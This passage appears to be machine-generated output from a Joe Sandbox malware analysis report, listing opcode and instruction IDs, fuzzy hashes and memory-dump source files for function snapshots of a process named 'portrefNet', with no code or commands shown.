                                        • Opcode ID: aefd5678b640a1667f92de4723a147cab1064fe4620d46e390c092975b115296
                                        • Instruction ID: 42adbc620aa903d51fe1f05d16dc58d6e8f6797ad38782d4f4a7617630198a35
                                        • Opcode Fuzzy Hash: aefd5678b640a1667f92de4723a147cab1064fe4620d46e390c092975b115296
                                        • Instruction Fuzzy Hash: 5E515070E0991D8FEFA4EBA8D8A5BADB7F1FF58301F100169D00DE3295DE7569818B40
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2daf47424489f4c64f234b022a35e8ecb0c1669e1d66898a632cbdb8d85aab0b
                                        • Instruction ID: 4722af20d50504ec36e23f51846b2ccff0faf80a0343403153ee68c8a4b5fe14
                                        • Opcode Fuzzy Hash: 2daf47424489f4c64f234b022a35e8ecb0c1669e1d66898a632cbdb8d85aab0b
                                        • Instruction Fuzzy Hash: 0551E430B18A894FDB5CDF5888645BA77E2FFE8300B15467EE45EC7295DE34A802C781
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c5972ede603c08f73c177fe77e15ad7d14c7486fd5c7db504a9a60a77154561c
                                        • Instruction ID: 95b22bcabdbc25209d32d16928fb802059a0dba42de01f0d2c9217ce6069599a
                                        • Opcode Fuzzy Hash: c5972ede603c08f73c177fe77e15ad7d14c7486fd5c7db504a9a60a77154561c
                                        • Instruction Fuzzy Hash: D1512A71E0A61E8FEB64EF94C4656EDB7F1FF99300F41427AD009E72A1DA786A44CB40
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 592e4bbbceed701d097cd13d45e4f8d46c851df02768d575512ed724a6886c4a
                                        • Instruction ID: 3052f2a078dc8cdce6366532fa871b5a4383e792b59c1adad24057bd27432807
                                        • Opcode Fuzzy Hash: 592e4bbbceed701d097cd13d45e4f8d46c851df02768d575512ed724a6886c4a
                                        • Instruction Fuzzy Hash: BC413532B0E74A4FE765DBB8C4655B877E0EFC6310B0642BBF41CC71A6DE68A9418341
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6a1718faa2b16705bb6c4d9200b05eb7edb799e4933eff8c34561cf642aeee9
                                        • Instruction ID: 7d5e155350726eda8ab8e8e28e4a8ea836f28fe062ca6398bb2f99fb93ffada6
                                        • Opcode Fuzzy Hash: e6a1718faa2b16705bb6c4d9200b05eb7edb799e4933eff8c34561cf642aeee9
                                        • Instruction Fuzzy Hash: 33315C30B18A498BDB4CDF48C8A55BA73E2FFD8715B14463EE45EC3295CE30E8528B81
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 11acc791420efbc9fb75946622e854b56d85777ea70f11baefdf9b7d385b6a31
                                        • Instruction ID: 37fe18fdbfe613327c44bcbb7a59466ca74b688d5b56fbcc0d845a9715b06b99
                                        • Opcode Fuzzy Hash: 11acc791420efbc9fb75946622e854b56d85777ea70f11baefdf9b7d385b6a31
                                        • Instruction Fuzzy Hash: 34217C30A0A60E8FEB59EF64C4695B977E0FF58305B014ABAD41DC71A1DF78E640CB40
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a337bc6a39afc67de3b0d7a7d87e82448165f16793bbdd0f744d59ff1c4241c9
                                        • Instruction ID: ea158fae602b4733c70d598fe34766d7f11662eab21d7e94d7d45e805bff2160
                                        • Opcode Fuzzy Hash: a337bc6a39afc67de3b0d7a7d87e82448165f16793bbdd0f744d59ff1c4241c9
                                        • Instruction Fuzzy Hash: 1A219F31A0AA4E8FEB68EBA4C4656F977E1FF99304F0105B9C01ED71E5DF69A601CB01
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0694664cff29734bc1145eb23024cf7ec564e58b12b978f73499461e82b7d73d
                                        • Instruction ID: 51fa5395e5c6ee3b1d255dd86388ee4d7d5f8a38b7d63881aa7febcedd96963d
                                        • Opcode Fuzzy Hash: 0694664cff29734bc1145eb23024cf7ec564e58b12b978f73499461e82b7d73d
                                        • Instruction Fuzzy Hash: A3115731F0E54E8FEB70ABB884790ED3BE0EF95700F0645B6C059C20A2ED60A144C284
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3a2b1d6382d7346089ab5e5bddf7a1f5f5111b0db0477ff885976cb61ea87b8
                                        • Instruction ID: 99734cce216d6975b4313882655ea392a5e39dc73e48b2460bd435a74fd1b3c4
                                        • Opcode Fuzzy Hash: b3a2b1d6382d7346089ab5e5bddf7a1f5f5111b0db0477ff885976cb61ea87b8
                                        • Instruction Fuzzy Hash: AC21B13094E68E8FE742ABB488685E97FF0FF9B300B0945FAD458C7072DA78A545CB51
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 41614a021477d05bce888214f13e5f4a4e2fe64fa6f29bd9d4576b5ee14f86d8
                                        • Instruction ID: 09ecca2f26563873282b62d96e11359b62186d2c9ece03e6674fc0a36aaef1b8
                                        • Opcode Fuzzy Hash: 41614a021477d05bce888214f13e5f4a4e2fe64fa6f29bd9d4576b5ee14f86d8